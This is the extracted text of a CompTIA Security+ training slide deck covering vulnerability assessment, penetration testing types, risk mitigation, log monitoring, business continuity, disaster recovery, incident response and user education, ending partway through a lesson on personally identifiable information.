Vulnerability Scanning
CompTIA Security+ Training
Threat and Vulnerability Assessment and Detection
• Applications/appliances have GUI interfaces and reports
–Nessus
–Retina
–SAINT
• Interpreting the results
–Reports from commercial scanners list open ports and vulnerabilities
• Identify false positives
• Identify vulnerabilities
• Identify lack of security controls
• Identify common misconfigurations
Vulnerability Scanning
CompTIA Security+ Training
Threat and Vulnerability Assessment and Detection
• Using any and all methods to try to break in to your fully protected network
• An experienced tester uses a variety of tools and methods
• OSSTMM and NIST have standard penetration testing methodologies
• Actively test and try to bypass your security controls
• Verify a threat exists without exploiting vulnerabilities
Penetration Testing
CompTIA Security+ Training
Threat and Vulnerability Assessment and Detection
• Black, white, and gray box testing
Penetration Testing
Black Box Penetration Testing
Tester acts as an outside hacker
Has no inside knowledge of the network prior to the test
Typically, most of the IT staff does not know the test is taking place
CompTIA Security+ Training
Threat and Vulnerability Assessment and Detection
• Black, white, and gray box testing
Penetration Testing
White Box Penetration Testing
Tester acts as a malicious insider with full network understanding
Has knowledge of code, systems, topology, a user account, ect.
IT staff knows about the test
CompTIA Security+ Training
Threat and Vulnerability Assessment and Detection
• Black, white, and gray box testing
Penetration Testing
Gray Box Penetration Testing
Tester acts as if he is an outsider working with a malicious insider
CompTIA Security+ Training
Threat and Vulnerability Assessment and Detection
Key Terms You Should Know
Term Definition
Vulnerability Assessment
Finding and assessing the holes and weaknesses in applications and systems
Threat Assessment Finding and assessing the source and means of the attacks that our systems are vulnerable to
Risk Assessment Determining the impact and likelihood of risks
Attack Surface
The area of an application or system that is visible, accessible, and therefore potentially vulnerable
CompTIA Security+ Training
Threat and Vulnerability Assessment and Detection
Key Terms You Should Know
Term Definition
Honeypot
A computer that is intentionally left open to attack in order to study how attacks are carried out and lure attackers away from legitimate systems
Honeynet More than one honeypot connected together or an entire virtual network meant to be attacked
Vulnerability Scanning
Using a database of known vulnerabilities to scan a system or network looking for weaknesses
Penetration Testing Actively testing your network security using any and all methods to simulate what attacks from hackers or malicious insiders would use
CompTIA Security+ Training
Threat and Vulnerability Assessment and Detection
Key Terms You Should Know
Term Definition
Black Box Testing Testing code or systems without any prior information about the inner workings of that application or system
White Box Testing Testing code or systems with full disclosure of the inner workings of that application or system
Gray Box Testing
Testing code or systems from the outside with some understanding of the inner workings to help guide the test
CompTIA Security+ Training
Threat and Vulnerability Assessment and Detection
In This Lesson:
Assessment Types
• Vulnerability
• Threat
• Risk
Assessment Techniques
• Baseline Reporting
• Code Review
• Determine Attack Surface
• Architecture
• Design Review
CompTIA Security+ Training
Threat and Vulnerability Assessment and Detection
In This Lesson:
Testing and Scanning
Tools
• Protocol Analyzer / Sniffer
• Port Scanner
• Honeypot and Honeynet
Vulnerability Scanning
Penetration Testing
• Black, White, and Gray Box Testing
CompTIA Security+ Training Instructor: Lisa Szpunar
Risk Mitigation and Deterrence
CompTIA Security+ Training
Risk Mitigation and Deterrence
In This Lesson:
Mitigation Strategies
Security Posture
• Initial Baseline Configuration
• Continuous Security Monitoring
• Remediation
Manual Bypassing of Electronic Controls
• Failsafe vs. Failopen
Change Management
Implement Security Controls Based on Risk
Detection vs. Prevention Controls
Hardening
Perform Routine Audits
• User Rights and Permissions Reviews
Data Loss or Theft Prevention
CompTIA Security+ Training
Risk Mitigation and Deterrence
In This Lesson:
Exam Objective: 2.1 (Partial) Explain risk related concepts
2.2 Carry out appropriate risk mitigation strategies
3.6 (Partial) Analyze and differentiate among types of mitigation and deterrent techniques
Policies
Security Policies
Privacy Policies
Acceptable Use Policies
Other Policies
Mitigation Strategies
CompTIA Security+ Training
Risk Mitigation and Deterrence
• The overall approach an organization takes to security
• Creating and maintaining your security posture
– Initial baseline configuration
• Take into account regulatory compliance
• Remember patch management
–Continuous security monitoring
• Utilize your monitoring systems
• Perform audits
• Keep up on the latest information with security organizations, websites, and blogs
–Remediation
• Quarantine that system until it meets the baseline
• Document and verify results
Security Posture
CompTIA Security+ Training
Risk Mitigation and Deterrence
• Electronic controls can be bypassed
– Turning off or short circuiting the power
– Overloading or confusing sensors
• Failsafe vs. Failopen
– Failsafe: Failure happens in a secure way
– Failopen: Failure happens in an unsecure way
Manual Bypassing of Electronic Controls
Failsafe Examples Failopen Examples
A failed electronic lock blocks any entry
A failed electronic lock remains unlocked
A failed application closes A failed application remains open
A failed firewall blocks all traffic A failed firewall allows all traffic
CompTIA Security+ Training
Risk Mitigation and Deterrence
• Working within predefined procedures and timelines for change
• Evaluating, authorizing, testing, carrying out, and documenting changes
• Changes to systems, configurations, what software is installed, etc.
– Configuration control of systems that have been baselined
• New deployments, expansion, and reorganization also falls under change management
Change Management
CompTIA Security+ Training
Risk Mitigation and Deterrence
Change Management
Change Management Goals
•Prevent new security vulnerabilities due to change
•Prevent loss of functionality due to change
•Schedule and stage change to minimize impact to users
•Communicate downtime in advance of implementing change
•Document change for communication and auditing purposes
•Allow changes to be reversed with a rollback strategy
•Require separation-of-duties through management oversight
•Follow up with changes after they are implemented
•Follow security minimum baselines and uncover changes to configuration baselines
CompTIA Security+ Training
Risk Mitigation and Deterrence
Risk-avoidance
Transference
Mitigation
Deterrence
Acceptance
• Risks are prioritized as a part of risk assessments and calculations
• The risks that will cost the most harm warrant the most resources to mitigate
• Security controls must be chosen and implemented in a systematic way
– The cost of the control must be less than the impact of the risk
• Including maintenance and monitoring
– The benefit of the control must be measurable or verifiable
Implement Security Controls Based on Risk
CompTIA Security+ Training
Risk Mitigation and Deterrence
• Detection controls watch for and issues alerts about possible attacks
• Prevention controls work to keep attacks from happening or take action to stop them once they start
• Examples:
– Intrusion detection systems vs. intrusion prevention systems
–Security camera vs. security guard
Detection vs. Prevention Controls
CompTIA Security+ Training
Risk Mitigation and Deterrence
• Intrusion Detection Systems vs. Intrusion Prevention Systems
– IDS
• Monitors network traffic and compares it to known attacks and network history
• Creates alerts when a possible attack or anomaly is detected
• Able to preform limited active controls
– IPS
• Does intrusion detection plus prevention
• Takes action in real time to stop attacks in progress
Detection vs. Prevention Controls
CompTIA Security+ Training
Risk Mitigation and Deterrence
• Security camera vs. security guard (have both for the most benefit)
Detection vs. Prevention Controls
Camera Guard
Technical solution Non-technical solution
May deter some wrongdoing if cameras are visible
Can proactively deter, prevent, and respond to issues
Always running Can have gaps in coverage
Records everything within range Relies on memory
Footage can be replayed later Relies on memory
Creates evidence for criminal cases Can collect evidence
Stationary with a limited field of view Able to move around
Has no intelligence Flexible and can adapt to situations
Less expensive More expensive
(Detection) (Prevention)
CompTIA Security+ Training
Risk Mitigation and Deterrence
• Reducing the attack surface of a system or application
–Disabling unnecessary services
–Protecting management interfaces and applications
• Restrict access
• Change default passwords
• Encrypt remote connections
–Protecting passwords
–Disabling unnecessary accounts
–Keeping patches, updates, and hot-fixes up to date
Hardening
CompTIA Security+ Training
Risk Mitigation and Deterrence
• Checking to make sure policies, procedures, and regulations are being followed
• Do on a routine schedule
• Often carried out by a third party
Perform Routine Audits
Plan
Conduct
Evaluate
Communicate Results
Make Changes
Document and Follow Up
CompTIA Security+ Training
Risk Mitigation and Deterrence
• User rights and permissions reviews
– Private audit
– Do users have the access and privileges that they should and no more?
– Who has administrative privileges?
– Work with management to determine what the expected rights and permissions should be
Perform Routine Audits
Plan
Conduct
Evaluate
Communicate Results
Make Changes
Document and Follow Up
CompTIA Security+ Training
Risk Mitigation and Deterrence
• Usage audit
– How are applications, systems, and resources being used?
– Often done after an incident
• Log file audit
– Studying logs for trends and correlations
– Making sure log files are not growing too large in size
Perform Routine Audits
Plan
Conduct
Evaluate
Communicate Results
Make Changes
Document and Follow Up
CompTIA Security+ Training
Risk Mitigation and Deterrence
• Administrative audit
– Are all change management and documentation procedures being carried out?
• Escalation audit
– Are communication and procedures in place to deal with incidents and disasters?
• Regulatory compliance audit
– PCI
– HIPPA
– SOX
Perform Routine Audits
Plan
Conduct
Evaluate
Communicate Results
Make Changes
Document and Follow Up
CompTIA Security+ Training
Risk Mitigation and Deterrence
• Data loss policy
–A legal statement that gives an overview of how a company protects its data under normal circumstances
–Also includes a statement that the company is not responsible for data loss due to some situations
• Data loss procedures
–Secure data disposal
–DLP system
–Monitoring
– Information models
–Backup and high availability
–Encryption
Data Loss or Theft Prevention
Policies
CompTIA Security+ Training
Risk Mitigation and Deterrence
• How a company intends to secure its assets
– Includes expectations for employee behavior, physical access, technical security controls, digital certificate handling, data handling, and more
• Policy sub-types
–Standards
• Mandatory rules that must be followed
–Guidelines
• General rules and recommendations that may require judgment on how and when to follow
–Procedures
• Step-by-step methods for how standards are carried out
Security Policies
CompTIA Security+ Training
Risk Mitigation and Deterrence
• For consumers
–A legal statement of what personal information a company collects from customers and what, if any, of this info is shared with third parties
• For employees
–What information should not be shared outside the company
–A statement to employees about what a company can do with the stored data and transmissions that happen within its network
• Must comply with applicable laws and regulations
• Dictates how data is collected, stored, and transmitted
Privacy Policy
CompTIA Security+ Training
Risk Mitigation and Deterrence
• Outlines how employees can use company systems and resources
– Internet
–Software
–Telephones
• How and if personal software and devices are allowed
–Phones
–Tablets
–USB drives
Acceptable Use Policy (AUP)
CompTIA Security+ Training
Risk Mitigation and Deterrence
–Mandatory vacations
– Job rotation
–Separation of duties
– Least privilege
–Password policy
–Clean desk policy
–Due care
–Document disposal and destruction policy
– Incident response
Other Policies
CompTIA Security+ Training
Risk Mitigation and Deterrence
Key Terms You Should Know
Term Definition
Security Posture The overall approach a company takes to security
Failsafe When a system or application fails, it does so in a secure way
Failopen
When a system or application fails, it does so in an unsecure way leading to privilege escalation and bypassing of security controls
Change Management
A systematic approach to plan, approve, test, implement, and document change
CompTIA Security+ Training
Risk Mitigation and Deterrence
Key Terms You Should Know
Term Definition
Detection Controls
Security controls that are designed to detect and alert you to possible security issues. Examples are IDS and security cameras
Prevention Controls Security controls that are designed to prevent security issues. Examples are IPS and security guards
Security Policy Standards, guidelines, and procedures that outline how a company secures its assets
Privacy Policy
States how customer information is collected and used and if employee data and communications are subject to monitoring
Acceptable Use Policy
States how employees are allowed to use company resources. It also lists rules for how or if personal devices are allowed
CompTIA Security+ Training
Risk Mitigation and Deterrence
What We Covered
Mitigation Strategies
Security Posture
• Initial Baseline Configuration
• Continuous Security Monitoring
• Remediation
Manual Bypassing of Electronic Controls
• Failsafe vs. Failopen
Change Management
Implement Security Controls Based on Risk
Detection vs. Prevention Controls
Hardening
Perform Routine Audits
• User Rights and Permissions Reviews
Data Loss or Theft Prevention
CompTIA Security+ Training
Risk Mitigation and Deterrence
What We Covered
Policies
Security Policies
Privacy Policies
Acceptable Use Policies
Other Policies
CompTIA Security+ Training Instructor: Lisa Szpunar
Log Monitoring and Reporting
CompTIA Security+ Training
Log Monitoring and Reporting
In This Lesson:
Reporting
• Alerts
• Alarms
• Trends
Monitoring and Analyzing Logs
Log Types
• Event Logs
• Audit Logs
• Security Logs
• Access Logs
Log Management
Exam Objective: 3.6 (Partial) Analyze and
differentiate among types of mitigation and deterrent techniques
CompTIA Security+ Training
Log Monitoring and Reporting
• Alerts
–Automated messages triggered by predetermined events
–Administrators set the alert triggers
• Low disk space
• Large number of failed login attempts
• Higher than normal CPU or memory usage
• Higher than normal network bandwidth use
• Patch/update failure
–Alert levels: green, yellow, or red
• Alarms
–A critical alert that needs immediate attention
Reporting
CompTIA Security+ Training
Log Monitoring and Reporting
• Trends
– Looking at events, alerts, and alarms over time can reveal many things
• Tendencies, underlying problems, equipment starting to fail, and more
–Graphs and reports make it easier to visualize trends
• False Positives
–Alerts that are not actual issues
–Reduce
• Tweaking metrics
• Looking for correlations
Reporting
CompTIA Security+ Training
Log Monitoring and Reporting
• Why Log?
–Keeps track of who, what, and when
–Accountability
– Intrusion detection
–Reconstruction after an incident
–Problematic trend detection
–Demonstrating compliance with policy or regulations
• Logs Are Created by Many Sources
–Routers, switches, firewalls, antimalware, IDS, authentication systems, and more
Monitoring and Analyzing Logs
CompTIA Security+ Training
Log Monitoring and Reporting
• Many Uses
–Machine health, network performance, user data, and more
–Security
• Incorrect login attempts
• Frequency of database access
• Number of active sessions
• Network traffic
• Automation and Consolidation Software Should Be Used
–Reporting
–Post-event analysis
–Real-time analysis
Monitoring and Analyzing Logs
CompTIA Security+ Training
Log Monitoring and Reporting
• Event logs
–Records system events
• Shutdowns, service starts, state changes, and more
Log Types
CompTIA Security+ Training
Log Monitoring and Reporting
• Event logs
–Records system events
• Shutdowns, service starts, state changes, and more
• Performance logs
–Records system performance
• CPU usage, memory usage, disk activity, and network usage
Log Types
CompTIA Security+ Training
Log Monitoring and Reporting
• Audit logs
–Records the activities of users and services
• Logins, object access, account changes, and configuration changes
–Holds users accountable
• Catches mistakes, reduces fraudulent activities, and tracks and logs network activity
– In accordance with the organization's security policies
Log Types
CompTIA Security+ Training
Log Monitoring and Reporting
• Security logs
– Logs from security devices, software, and services
• IDS/IPS, firewalls, antivirus software, authentication services
• Access logs
–Records access to resources
–Records physical access to buildings or secure areas
Log Types
CompTIA Security+ Training
Log Monitoring and Reporting
• Generating, transferring, storing, analyzing, and disposing of logs
• Security of logs
–Contains info about your network and users
–Restrict access, encrypt, and hash (integrity)
–Protect your log files while at rest and in transit
Logs Management
Issues to Be Aware Of
•Limited resources for log analysis and storage
•Lack of clear log analysis goals
•Incompatible or proprietary log formats
•Inconsistent time stamps on logs
CompTIA Security+ Training
Log Monitoring and Reporting
• Storage and Backup
–Store logs separate from the devices you are monitoring
–Keep logs in a easy to access database for 60-90 days
• Ready for analysis, forensic investigations, and audits
– Log retention
• May be needed for regulatory compliance or legal reasons
• Logs can be compressed for log term storage
• Log Disposal
–Security destroy logs once the data retention period has ended
Logs Management
CompTIA Security+ Training
Log Monitoring and Reporting
Key Terms You Should Know
Term Definition
Alerts Error, warning, or information notifications
Alarms The most severe alerts that need immediate attention
Trends Patterns of events that happen over time reveal trends that can point to underlying problems
False Positive A reported security issue that once examined turns out to be a false alarm
CompTIA Security+ Training
Log Monitoring and Reporting
What We Covered
Reporting
• Alerts
• Alarms
• Trends
Monitoring and Analyzing Logs
Log Types
• Event Logs
• Audit Logs
• Security Logs
• Access Logs
Log Management
CompTIA Security+ Training Instructor: Lisa Szpunar
Business Continuity
CompTIA Security+ Training
Business Continuity
In This Lesson:
Exam Objective: 2.5 Compare and contrast aspects of business continuity
Business Continuity vs. Disaster Recovery
Business Continuity Planning (BCP) and Testing
Business Impact Analysis
IT Contingency Planning
• Removing Single Points of Failure
Continuity of Operations
Succession Planning
CompTIA Security+ Training
Business Continuity
Business Continuity vs. Disaster Recovery
Business
Continuity
Disaster
Recovery
The continued operation of the organization
Recover from and rebuild the organization after a disaster has occurred
CompTIA Security+ Training
Business Continuity
• Writing the policies and deciding on procedures for business continuity
– Identify the critical business functions (CBF)
• CBF are complex and interconnected
– Almost everything goes through IT
–Determine what threats are most likely to cause a disruption
–Create countermeasures that will minimize disruptions
• BCP involves
–Risk mitigation planning
–Change management
• Testing
–Test your BCP before you need it!
Business Continuity Planning (BCP) and Testing
–Business impact analysis
–Recovery planning
Document
Business Continuity Planning (BCP) and Testing
Business Impact Analysis
Develop Solutions
Implement and Train
Test
Maintenance
CompTIA Security+ Training
Business Continuity
• Focuses on the impact of an event and recovering from that event
– Loss of asset or significant change to the business or market
• Not concerned with how the event was caused (threat and vulnerabilities)
• Steps
1. Define and prioritize what the critical business functions (CBF) are
2. Determine the impact of a disruption to a CBF
3. Calculate the amount of time that is acceptable for the disruption to last (recovery time objective)
4. Document the procedures for how to recover and what resources are needed for recovery
Business Impact Analysis
CompTIA Security+ Training
Business Continuity
• A part of the overall BCP that covers:
–Security threats
–System failure
–Disaster
• Implement preventative controls
• Remove single points of failure
– IT infrastructure, utilities, or facilities
– Implement redundancy and fault tolerance
–Use analysis calculations to decide which single points of failure to remove
• Document contingency strategies and procedures
• Perform and test backups
IT Contingency Planning
CompTIA Security+ Training
Business Continuity
• Some refer to a continuity of operations plan (COOP) as the same as a BCP
• NIST refers to a COOP as a plan for how to restore essential functions at an alternative site
–Order of succession
–Order of functions to be brought back up
–Human resources management
–Budget
Continuity of Operations
CompTIA Security+ Training
Business Continuity
• Having individuals prepared to fulfill/replace key positions within the company
–Planned or unplanned
–A comprehensive succession plan funnels down the line
• Minimize disruption that a gap in leadership could cause
• What does that mean for IT?
–Digital certificate key management
–Account management
Succession Planning
CompTIA Security+ Training
Business Continuity
Key Terms You Should Know
Term Definition
Business Continuity Planning
Analyzing, developing, implementing, training, testing, and maintaining the policies and processes that keep critical business functions going day-to-day and minimizes the impact of disruptions
Business Impact Analysis
Determines the most important critical business functions, the impact of a disruption to those functions, and how to recover from the disruption
Single Point of Failure
A component of a system that, if fails, will cause the entire system to fail
Critical Business Functions (CBF)
A process that is vital to the health of the business. If this process were to sustain a long disruption the company would suffer great loss
CompTIA Security+ Training
Business Continuity
What We Covered
Business Continuity vs. Disaster Recovery
Business Continuity Planning (BCP) and Testing
Business Impact Analysis
IT Contingency Planning
• Removing Single Points of Failure
Continuity of Operations
Succession Planning
CompTIA Security+ Training Instructor: Lisa Szpunar
Disaster Recovery Planning
CompTIA Security+ Training
Disaster Recovery Planning
In This Lesson:
Disaster Recovery Plan
Service Level Agreement (SLA)
• Mean Time to Restore (MTTR)
• Mean Time Between Failures (MTBF)
• Recovery Time Objectives (RTO)
• Recovery Point Objectives (RPO)
Utilities
CompTIA Security+ Training
Disaster Recovery Planning
In This Lesson:
Backup and Recovery
Backup Types
Backup Plans
Backup Storage Options
Recovering from Backups
Backup and Recovery Considerations
Exam Objective: 2.7 Execute disaster recovery plans and procedures
High Availability
Redundancy
Fault Tolerance
RAID
Load Balancing
Clustering
Alternate/Backup Sites
• Hot, Cold, and Warm Sites
CompTIA Security+ Training
Disaster Recovery Planning
• Scope
– IT backup and recovery procedures
–People
– Locations
• Develop, test, train, maintenance, and document
• Who sees the plan?
Disaster Recovery Plan
CompTIA Security+ Training
Disaster Recovery Planning
• Mean Time to Restore (MTTR)
–Also called mean time to repair
–The average time it takes to repair a given component or system
• Mean Time Between Failures (MTBF)
–Estimation of how often an outage will happen
• Recovery Time Objectives (RTO)
–The longest acceptable duration of downtime
–What is the benchmark for what is considered “uptime”?
• Recovery Point Objectives (RPO)
–How much data loss or other loss is acceptable?
–Measured in hours
Service Level Agreement (SLA)
CompTIA Security+ Training
Disaster Recovery Planning
• Power, phones, and internet connectivity can be lost in a disaster
• Single points of failure outside of the company's control
–Know the backup policy for your ISP
• Disaster recovery plans can have provisions for utilities
–Back up generators
Utilities
Backup and Recovery
CompTIA Security+ Training
Disaster Recovery Planning
Backup Types
Backup Type Description Archive Bit Cleared?
Full Backs up all files Yes
Incremental
Backs up only the files that have changed since last incremental backup
Yes
Differential
Backs up the files that have changed since last full backup
No
Copy A copy of all data No
Snapshot/Image Taking an copy of the entire system at a point in time
N/A
(Cumulative Incremental)
(Differential Incremental)
CompTIA Security+ Training
Disaster Recovery Planning
• What to backup?
– Databases, email database, user files, etc.
• What method and frequency of backups?
– Full Archival Method
– Grandfather, Father, Son Method (GFS)
– Progressive Paradigm (Incremental Forever)
• How long to retain backups?
• Short-term
• Long-term
• Do not confuse backups with archives
Backup Plans
Backup Plans
Grandfather, Father, Son Method
2010
2009
2008
2007
2006
2005
2004
January
February
March
April
May
June
July
August
September
October
November
December
Week 1
Week 2
Week 3
Week 4
Week 5
Son
Father
Grandfather
CompTIA Security+ Training
Disaster Recovery Planning
• Backup Media
– Tape
– Disk
– Optical
– Online
• Location of Backups
– Secure backup media wherever it is
– Onsite: less expensive, easier, but is not protected against local disasters
– Offsite: more expensive, requires more overhead, but data is protected against local disasters
– Both would be ideal
Backup Storage Options
CompTIA Security+ Training
Disaster Recovery Planning
• Practice the restoration process
–Depending on the backup type you can restore individual files, mailboxes, databases, whole systems, etc.
• Be sure your backups are usable
–Configuration auditing
–Error detection
–Keep old backup hardware
Recovering from Backups
CompTIA Security+ Training
Disaster Recovery Planning
• Backup vs. Backout
–Backup: Used to restore data due to data corruption, data loss, or hardware failure
–Backout: Used to restore back to a previous point
• A way to undo a change that has been made
– Updates, configuration changes, software installs, migrations, and firmware updates
• A good backout policy prepares for this with images, snapshots, or other backups
Recovering from Backups
CompTIA Security+ Training
Disaster Recovery Planning
Examples
Recovering from Backups
Sun Mon Tues Wed Thur Fri Sat
Full Diff 1 Diff 2 Diff 3 Diff 4 Diff 5 Diff 6
Sun Mon Tues Wed Thur Fri Sat
Full Inc 1 Inc 2 Inc 3 Inc 4 Inc 5 Inc 6
Incremental Backups to Tapes
Differential Backups to Tapes
Tapes Needed for Full Restore
Full, Inc 1, Inc 2, Inc 3, Inc 4
Tapes Needed for Full Restore
Full, Diff 4
Backup Challenges
•Growing amount of data
•Remote office locations
•24 hour business
•Regulatory and legal requirements
Backup and Recovery Best Practices
•Have onsite or online backups for fast recovery
•Keep copies of backups and archives offsite
•Have point-in-time versions in case of accidental
changes or deletions
•Include error checking to make sure backups
were created correctly
•Continually revisit the organization's backup
needs as technology changes
•Do practice recoveries to test your backups
Backup and Recovery Considerations
High Availability (HA)
CompTIA Security+ Training
Disaster Recovery Planning
• Having duplicate systems, devices, or data paths to failover to when a failure occurs
–Redundant servers can be clustered or load balanced
–Can also have redundant hardware like firewalls and routers
• Redundant components and spare parts
• Ensure functionality continues
–Might not be automatic failover (high availability)
Redundancy
CompTIA Security+ Training
Disaster Recovery Planning
• The ability for a device or system to remain operational in the event of a component failure
–Might have reduced functionality or efficiency
• Redundant hardware components
• Backup power or at least an uninterruptable power supply (UPS)
Fault Tolerance
I’m Ok!
CompTIA Security+ Training
Disaster Recovery Planning
• Also called redundant array of inexpensive disks
• Using multiple disks to provide fault tolerance and improve performance
RAID: Redundant Array of Independent Disks
RAID Level Name Redundant?
0 Disk Striping No
1 Disk Mirroring Yes
5 Disk Striping with Distributed Parity Yes
6 Disk Striping with Dual Parity Yes
10 (1+0) Mirrored Stripe Set Yes
CompTIA Security+ Training
Disaster Recovery Planning
• Distributes computing workload across multiple machines
• If one redundant server goes down the load balancer will compensate (availability)
Load Balancing
Redundant
Serv
ers
Clients Load Balancer Switch
CompTIA Security+ Training
Disaster Recovery Planning
• A team of servers running the same applications or services
• Monitors and load balances themselves with the use of a heartbeat connection
• When the active node does not respond to the heartbeat the passive node takes over
• More complex clustering has all nodes active at the same time
Clustering
Clients
Secondary Node
Primary Node
Shared Storage
CompTIA Security+ Training
Disaster Recovery Planning
Alternate/Backup Sites
Real Time Replication
Main Site Hot Site
CompTIA Security+ Training
Disaster Recovery Planning
Alternate/Backup Sites
Main Site Cold Site
CompTIA Security+ Training
Disaster Recovery Planning
Alternate/Backup Sites
Main Site Warm Site
CompTIA Security+ Training
Disaster Recovery Planning
Key Terms You Should Know
Term Definition
Mean Time to Restore (MTTR)
The average time required to repair a failed component or device
Mean Time Between Failures (MTBF)
The predicted time between failures of a system during operation
Recovery Time Objective (RTO)
The maximum amount of time a process must be restored in before causing an unacceptable impact to business continuity
Recovery Point Objective (RPO)
How many hours of data can be lost or how far back in time is acceptable to recover to
Backout Plan
The policies and procedures for preparing for and carrying out a backout. A backout is rolling back a system to a specific point in time
CompTIA Security+ Training
Disaster Recovery Planning
Key Terms You Should Know
Term Definition
High Availability
The approach and system implementation that ensures a high level of continued operations (uptime). What is considered an acceptable amount of downtime is decided on a case by case basis
Redundancy The duplication of critical components, systems, or functions to increase reliability and uptime
Fault Tolerance The ability of a system to continue operation, rather than failing completely, when a component fails
Redundant Array of Independent Disks
(RAID)
Using different configurations of disk drives and their data distribution to improve performance and fault tolerance
CompTIA Security+ Training
Disaster Recovery Planning
Key Terms You Should Know
Term Definition
Clustering Using a group of linked computers working together to improve performance and availability
Hot Site A remote location with redundant systems and data that is updated in real time
Cold Site
A remote location that has no data or systems but is available as a contingency location to rebuild systems from backups
Warm Site
A remote location that has some infrastructure and/or data ready but does requires some time and human effort before systems are up and running
CompTIA Security+ Training
Disaster Recovery Planning
What We Covered
Disaster Recovery Plan
Service Level Agreement (SLA)
• Mean Time to Restore (MTTR)
• Mean Time Between Failures (MTBF)
• Recovery Time Objectives (RTO)
• Recovery Point Objectives (RPO)
Utilities
CompTIA Security+ Training
Disaster Recovery Planning
What We Covered
Backup and Recovery
Backup Types
Backup Plans
Backup Storage Options
Recovering from Backups
Backup and Recovery Considerations
High Availability
Redundancy
Fault Tolerance
RAID
Load Balancing
Clustering
Alternate/Backup Sites
• Hot, Cold, and Warm Sites
CompTIA Security+ Training Instructor: Lisa Szpunar
Incident Response
CompTIA Security+ Training
Incident Response
In This Lesson:
Exam Objective: 2.3 Execute appropriate incident response procedures
Incident Response Plan
Damage and Loss Control
Chain of Custody
First Responder
Basic Forensic Procedures
• Order of Volatility (OOV)
• Record Time Offset
• Capture System Image
• Document Network Traffic and Logs
• Collect Relevant Backups
• Capture Video
• Take Hashes
• Capture Screenshots
• Interview Witnesses
• Track Man Hours and Expense
CompTIA Security+ Training
Incident Response
• “Incident”
• Polices and procedures
–Response procedures
– Incident response team
–Resources available
– Forensic policies
• Evidence gathering procedures
–Communication
Incident Response Plan
High Med Low
High 1 2 3
Med 2 3 4
Low 3 4 5
Urgency
Im
pa
ct
Prio
rity
Incident Response Plan
Identify and Report
• Detection
• Confirmation
• Log
Investigate
•Diagnose •Categorize and Prioritize •Escalate •Create Recovery Plan
Resolve/Recover
• Carry Out
• Test
Debrief
• Document
• Lessons Learned
• Make Improvements
CompTIA Security+ Training
Incident Response
• Minimizing loss due to an incident
• Know how many and which systems are affected by the incident
• Disconnect the affected systems from the network
• Keep critical business functions available
Damage and Loss Control
Forensics
CompTIA Security+ Training
Incident Response
• Maintain the CIA of the evidence
• Imperative for using evidence in a court of law
• Document and label when, where, who, and how each piece of evidence was collected
• Seal in tamper evident bags with evidence tags on the outside
• Log when and who touches or transports any piece of evidence
• Store long term under lock and key
Chain of Custody
CompTIA Security+ Training
Incident Response
• What to do if you are the first person to uncover or respond to an incident
• Assess the situation and contain the incident
–Unplug the affected systems from the network
* If allowed by incident respond policies
• Don’t disturb the environment if evidence needs to be collected
–Think about the chain of custody
• Follow the escalation policy
–Who to notify
–What policies and procedures to follow
• Negate all the above restrictions if human life is in danger
First Responder
CompTIA Security+ Training
Incident Response
• Order of Volatility (OOV)
–Collect the shortest living evidence first
• Record Time Offset
–Note how much time the clock on each affected system is off from the real time
– Important for reconstructing an accurate timeline
• Capture System Images
–Make duplicates of the exploited system to gather information from
–Some forensic polices require the original to stay intact (best evidence rule)
Basic Forensic Procedures
CompTIA Security+ Training
Incident Response
• Document Network Traffic and Logs
–Useful to reconstruct the attack
– Look for trends
• Collect Relevant Backups
–Secure any backups created for the affected systems during and before the incident took place
• Capture Video
–Record the state of the physical environment
–While carrying out forensic procedures
Basic Forensic Procedures
CompTIA Security+ Training
Incident Response
• Take Hashes
–A way to know if a file or image has changed
–A 128 bit MD5 hash
• Capture Screenshots
– Using screen snagging applications of the duplicate image
– Use a digital camera if on the exploited system
• Interview Witnesses
–Ask and document (record interview if possible)
–Sooner rather than later
Basic Forensic Procedures
CompTIA Security+ Training
Incident Response
• Track Man Hours and Expense
–Keep track of how much an incident coasted to investigate and resolve
–Document the time it takes for each step and the cost of all resources used
• Document everything and maintain the chain of custody
Basic Forensic Procedures
CompTIA Security+ Training
Incident Response
Key Terms You Should Know
Term Definition
First Responder
When referring to an IT incident response the first person to discover or respond to an incident attempts to contain the incident and notifies the proper personnel
Chain of Custody
Detailed documentation about the gathering, custody, transfer, analysis, and disposing of evidence
Order of Volatility
When referring to an IT incident respond the information that will disappear like RAM should be gathered before less volatile info
CompTIA Security+ Training
Incident Response
What We Covered
Incident Response Plan
Damage and Loss Control
Chain of Custody
First Responder
Basic Forensic Procedures
• Order of Volatility (OOV)
• Record Time Offset
• Capture System Image
• Document Network Traffic and Logs
• Collect Relevant Backups
• Capture Video
• Take Hashes
• Capture Screenshots
• Interview Witnesses
• Track Man Hours and Expense
CompTIA Security+ Training Instructor: Lisa Szpunar
User Education
CompTIA Security+ Training
User Education
In This Lesson:
Security Policy Training and Procedures
• Compliance with Laws, Best Practices, and Standards
Threat Awareness
• New Viruses
• Phishing Attacks
• Zero Day Exploits
Regulatory Compliance
Personally Identifiable Information
Social Networking
Peer to Peer (P2P) File Sharing
CompTIA Security+ Training
User Education
In This Lesson:
Exam Objective: 2.4 Explain the importance of security
related awareness and training
User Habits
• Password Behaviors
• Data Handling
• Clean Desk Policies
• Personally Owned Devices
Information Classification
Data Labeling, Handling ,and Disposal
CompTIA Security+ Training
User Education
• Compliance with laws, best practices, and standards
• Communication and awareness
• Communicate the importance and rationale for the policies
• Foster user acceptance and buy-in
• Get feedback on user experience and concerns
• Education and training
–Expectations for behavior
–Types: On-the-job, mandatory meetings, classroom, online, CBT
Security Policy Training and Procedures
CompTIA Security+ Training
User Education
• Keep informed of the latest threats
–Zero day exploits
• Communicate with users about current threat topics
–Monthly email
–SharePoint
• Topics include:
–Phishing attacks – remind users to not click on links in emails or IMs
–Social engineering tactics
–New viruses and zero day exploits – remind users to keep their home computers patched and up to date
Threat Awareness
CompTIA Security+ Training
User Education
• HIPAA: Health Insurance Portability and Accountability Act
–Heath and insurance institutions must keep patients’ health information secured
• PCI DSS: Payment Card Industry Data Security Standard
–Designed to ensure that all companies that process, store, or transmit credit card information maintain a secure environment
• SOX: Sarbanes-Oxley Act
–Mandates strict reporting requirements and internal controls of financial information
Regulatory Compliance
CompTIA Security+ Training
User Education
• GLBA: Gramm-Leach-Bliley Act
–Requires banks and financial institutions to communicate their privacy polices about disclosing customer information
• FERPA: Family Educational Rights and Privacy Act
–Says that student information can not be disclosed without the student's permission
–A student must be given access to their own records if requested
Regulatory Compliance
CompTIA Security+ Training
User Education
• Information that can be used to identify an individual
–Social Security number, birth date, address, biometric info
• Information linked to an individual
